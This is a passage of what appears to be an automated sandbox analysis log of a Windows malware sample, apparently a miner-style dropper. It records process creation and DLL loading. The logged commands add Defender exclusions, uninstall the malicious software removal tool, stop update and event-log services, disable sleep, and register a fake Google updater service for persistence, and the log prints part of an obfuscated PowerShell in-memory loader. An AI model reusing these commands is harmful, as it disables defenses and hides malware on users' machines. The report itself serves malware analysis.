          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tvJmJWkkljdL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rUCvlIraVSkSNU,[Parameter(Position=1)][Type]$lDxjOqsFCa)$hzEPfdAIUJU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Mem'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+'ic'+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$hzEPfdAIUJU.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$rUCvlIraVSkSNU).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'aged');$hzEPfdAIUJU.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+','+''+[Char](72)+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+[Char](78)+'e'+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t,V'+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$lDxjOqsFCa,$rUCvlIraVSkSNU).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $hzEPfdAIUJU.CreateType();}$opuJgspdjbNOB=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+'et'+[Char](104)+''+[Char](111)+''+[Char](1
          Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{221f05ee-8fb0-4424-9ba0-bc3ff8f1bf74}
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
